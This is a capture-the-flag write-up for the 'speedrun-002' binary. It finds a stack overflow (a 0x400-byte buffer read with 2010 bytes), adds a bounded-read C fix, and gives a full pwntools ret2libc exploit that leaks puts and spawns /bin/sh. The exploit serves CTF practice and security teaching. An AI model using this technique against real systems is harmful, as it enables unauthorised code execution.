How to Solve

  1. IDA : The program first requires the input "Everything intelligent is so boring.". buf is 0x400 bytes, but the read call accepts 2010 bytes of input.
  2. gdb speedrun-002, checksec : NX is enabled.
  3. So this is a ROP problem.
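The overflow from step 1, a fixed 0x400-byte stack buffer filled by a read() of 2010 bytes, as an added C example that is not the challenge's source: the vulnerable pattern beside a bounded replacement. The two sizes come from the writeup; the function names and the pipe-based harness are assumptions.

```c
#include <string.h>
#include <unistd.h>

#define BUF_SIZE 0x400  /* stack buffer size noted in the writeup */
#define READ_LEN 2010   /* length the binary passes to read() */

/* Vulnerable pattern (assumed shape): read() may write READ_LEN bytes
 * into a BUF_SIZE buffer, so the excess overwrites the saved frame. */
ssize_t read_input_unsafe(int fd, char *buf /* BUF_SIZE bytes */) {
    return read(fd, buf, READ_LEN);
}

/* Hardened replacement: the limit comes from the real buffer size, one
 * byte is kept for the terminator, short reads and errors are handled,
 * and reading stops at the end of the line. */
ssize_t read_input_bounded(int fd, char *buf, size_t bufsz) {
    size_t total = 0;
    if (bufsz == 0) return -1;
    while (total < bufsz - 1) {
        ssize_t n = read(fd, buf + total, bufsz - 1 - total);
        if (n < 0) return -1;
        if (n == 0) break;                                   /* EOF */
        total += (size_t)n;
        if (memchr(buf + total - (size_t)n, '\n', (size_t)n)) break;
    }
    buf[total] = '\0';
    return (ssize_t)total;
}

/* Feeds constructed input through a pipe to the bounded reader and
 * returns how many bytes it accepted: never more than BUF_SIZE - 1. */
ssize_t feed_bounded(const char *data, size_t len) {
    int fds[2];
    char buf[BUF_SIZE];
    if (pipe(fds) != 0) return -1;
    ssize_t wrote = write(fds[1], data, len);  /* len < pipe capacity */
    close(fds[1]);
    ssize_t got = wrote == (ssize_t)len ? read_input_bounded(fds[0], buf, sizeof buf) : -1;
    close(fds[0]);
    return got;
}

/* The writeup's case: 2010 bytes of filler, truncated to 0x3ff bytes. */
ssize_t demo_oversized_input(void) {
    char big[READ_LEN];
    memset(big, 'A', sizeof big);
    return feed_bounded(big, sizeof big);
}
```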

Design the Payload

puts(puts_got); // leak the address of puts
system("/bin/sh", NULL, NULL);

Find the gadget : ROPgadget --binary speedrun-002 | grep


Exploit

from pwn import *

p = process('./speedrun-002')
e = ELF('./speedrun-002')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

puts_plt = e.plt['puts']
puts_got = e.got['puts']

pr = 0x4008a3     # pop ; ret gadget (loads rdi)
ppr = 0x4008a1    # pop ; pop ; ret gadget (loads rsi and one more register)
main = 0x4007ce   # return to main after the leak for a second overflow

puts_offset = libc.symbols['puts']
system_offset = libc.symbols['system']
binsh_offset = next(libc.search(b"/bin/sh"))

# Stage 1: fill buf (0x400) and saved rbp (8), then puts(puts_got) and go back to main
payload = b"A" * 0x400
payload += b"B" * 8
payload += p64(pr) + p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)

p.sendlineafter(b'?\n', b"Everything intelligent is so boring.")
p.sendlineafter(b'more.\n', payload)

p.recvline()                    # 'Fascinating\n'
leak = u64(p.recvn(6) + b'\x00' * 2)   # leaked puts address (6 significant bytes)
libc_base = leak - puts_offset
system = libc_base + system_offset
binsh = libc_base + binsh_offset

# Stage 2: system("/bin/sh", 0, 0)
payload = b"A" * 0x400
payload += b"B" * 8
payload += p64(pr) + p64(binsh)
payload += p64(ppr) + p64(0) + p64(0)
payload += p64(system)

p.sendlineafter(b'?\n', b"Everything intelligent is so boring.")
p.sendlineafter(b'more.\n', payload)

p.interactive()

Get The Shell

[screenshot: shell obtained on speedrun-002]

